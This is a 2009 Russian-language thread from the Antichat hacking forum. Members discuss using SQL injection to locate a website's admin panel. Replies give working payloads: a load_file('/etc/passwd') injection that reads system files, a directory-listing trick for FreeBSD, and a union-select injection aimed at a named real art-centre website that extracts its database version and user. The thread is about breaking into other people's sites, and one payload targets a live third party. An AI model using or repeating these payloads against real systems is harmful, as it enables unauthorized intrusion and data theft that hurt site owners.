HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.02.2009, 22:07
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию

возможно ли узнать местонахождение админики через sql inj допустим в 5 версии mysql/mssql ?
 
Ответить с цитированием

  #2  
Старый 02.02.2009, 22:16
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

Цитата:
Сообщение от Lancellot  
возможно ли узнать местонахождение админики через sql inj допустим в 5 версии mysql/mssql ?
Ну можно, как сказали, через load_file('/'). Смотри пример: file.php?id=-1+1,2,load_file('/etc/passwd'),4,5--
3 - выводимое поле. Я просто привел пример. Если есть ошибка, то загоняешь весь путь к файлу и там рыщешь.
 
Ответить с цитированием

  #3  
Старый 02.02.2009, 22:23
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Tigger  
Ну можно, как сказали, через load_file('/'). Смотри пример: file.php?id=-1+1,2,load_file('/etc/passwd'),4,5--
3 - выводимое поле. Я просто привел пример. Если есть ошибка, то загоняешь весь путь к файлу и там рыщешь.
Не нужно переиначивать мои слова. Полный путь к файлу ничего не даст. Человек просил админку. Просмотр ФАЙЛОВ возможен на любой оси , если есть права(но он ничего не даст), а вот просмотр КАТАЛОГОВ возможен на фряхе. Тоесть, либо читаем конфиги и ищем дирректорию веба, а потом просматриваем её, либо , если есть расскрытие, сразу просматриваем ДИРРЕКТОРИЮ

file.php?id=-1+1,2,load_file('/etc/'),4,5--
Выведит содержимое каталога etc
Цитата:
Сообщение от Lancellot  
хорошо, спасибо.
теперь идем дальше... если к примеру субд mssql читая INFORMATION_SCHEMA.TABLES отвечает ли какая-нибудь таблица за местонахождение админки, ну естественно не во всех движках?
НЕТ
 
Ответить с цитированием

  #4  
Старый 02.02.2009, 22:11
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Lancellot Если скуль под рутом и ось фряха. На фре есть возможность просмотра каталога load_file('/'), ну или в хексе. если маджик квот-он
 
Ответить с цитированием

  #5  
Старый 02.02.2009, 22:23
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию

хорошо, спасибо.
теперь идем дальше... если к примеру субд mssql читая INFORMATION_SCHEMA.TABLES отвечает ли какая-нибудь таблица за местонахождение админки, ну естественно не во всех движках?
 
Ответить с цитированием

  #6  
Старый 03.02.2009, 03:11
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию

при определённых действиях выдаёт ошибку

PerlScript Error error '80004005'

(in cleanup) dbresults failed at C:/Perl/site/lib/MSSQL/Sqllib.pm line 1185.

/index.asp, line 3

???возможно ли чтолибо сдесь?
 
Ответить с цитированием

  #7  
Старый 03.02.2009, 03:44
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


По умолчанию

В любой запрос можно вклиниться... Главное понять какая там БД, хорошо бы увидеть линк...
 
Ответить с цитированием

  #8  
Старый 03.02.2009, 14:13
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Всем спасибо!

Последний раз редактировалось Octave_Parango; 03.02.2009 в 15:27..
 
Ответить с цитированием

  #9  
Старый 03.02.2009, 14:25
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Octave_Parango Она простейшая, если лень читать статьи, то может хотя-бы поиск по форуму?
https://forum.antichat.ru/showpost.php?p=1024484&postcount=7287
 
Ответить с цитированием

  #10  
Старый 03.02.2009, 14:26
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

эм.. обычная скуля.. даже думать не надо, ибо видно запрос =\
http://www.rockportartcenter.com/exhibitions/detail.php?uid=450%27+union+select+1,2,3,4,5,6,7,8 ,version(),10,11,12,13,14,15,16,17,18,19,20,21,22, user()/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.